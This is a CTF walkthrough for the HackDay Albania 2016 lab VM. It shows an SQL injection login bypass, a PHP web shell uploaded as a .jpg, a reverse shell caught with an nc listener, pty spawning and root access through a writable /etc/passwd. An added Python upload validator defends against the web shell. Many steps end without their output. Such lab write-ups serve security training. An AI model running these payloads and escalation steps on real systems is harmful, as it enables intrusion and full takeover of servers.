This was used in HackDay Albania’s 2016 CTF.
The level is beginner to intermediate.
It uses DHCP.
Note: VMware users may have issues with the network interface going down by default. We recommend (for once!) using Virtualbox.
nmap -sT 10.0.2.9
Nmap version scan:
Checking port 8008 with browser:
Checked all URIs with a script; they have the same output:
But one is different:
Seems to be Apache 2.4.18:
Checked all URLs from robots.txt with a script to see if there is a vulnbank directory inside:
Check the directory with a browser:
Test for SQL injection with a quote:
The following SQL injection worked:
admin' or '1' = 0 #
Now we can upload the reverse shell.
After uploading a jpg image file we'll find the file location:
So now try some PHP in a file called shell.jpg:
$cmd = ($_REQUEST["cmd"]);
Download php-reverse-shell.php from:
Upload the file and access it via the ticket system:
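As an added example (not code from the original writeup), a server-side check in Python for the upload step above: it only accepts a file when its extension, its magic bytes and its content all agree that it is an image, which rejects a PHP file renamed to .jpg as well as a real image with PHP appended. The function and sample names are assumptions.

```python
import os
import re

# Allow-listed image extensions and the magic bytes each must start with.
ALLOWED_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# PHP open tags: if the server ever runs this file as PHP (a misconfigured
# handler, an include bug), an "image" carrying one of these becomes a shell.
PHP_TAG_RE = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)


def validate_image_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an upload that claims to be an image."""
    # Drop any path the client supplied so "../x.jpg" cannot leave the upload dir.
    base = os.path.basename(filename)
    _, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension {ext or '(none)'} not allowed"
    # Double extensions such as shell.php.jpg are rejected as well.
    if "." in base[: -len(ext)]:
        return False, "multiple extensions not allowed"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
        return False, "content does not match declared image type"
    if PHP_TAG_RE.search(data):
        return False, "embedded PHP code detected"
    return True, "ok"


# Constructed samples: a minimal JPEG header, and the one-line PHP fragment
# from the walkthrough saved under an image name.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16
SAMPLE_PHP = b'<?php $cmd = ($_REQUEST["cmd"]); ?>'

if __name__ == "__main__":
    for name, blob in [("photo.jpg", SAMPLE_JPEG), ("shell.jpg", SAMPLE_PHP),
                       ("shell.php.jpg", SAMPLE_JPEG), ("pic.jpg", SAMPLE_JPEG + SAMPLE_PHP)]:
        print(name, validate_image_upload(name, blob))
```

Storing accepted files outside the web root and serving them through a handler that never executes them closes the remaining gap this check leaves.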
We need to have the netcat listener running on Kali:
nc -vnlp 4444
Spawn the pty shell:
python3 -c 'import pty; pty.spawn("/bin/sh")'
The bank application is running with a MySQL database, so there is a config file:
Connect to the mysql database:
Klienti means clients, and each of them has a password:
Finding all writable files:
find / -writable -type f 2>/dev/null
/etc/passwd appears to be writable for others.
So I could create a password and add a user:
Create the password hash on the Kali box:
Create a file called passwd with the following string:
Create an encoded string to copy and paste to the target:
Echo and decode the string into /etc/passwd:
su - rootaccess3: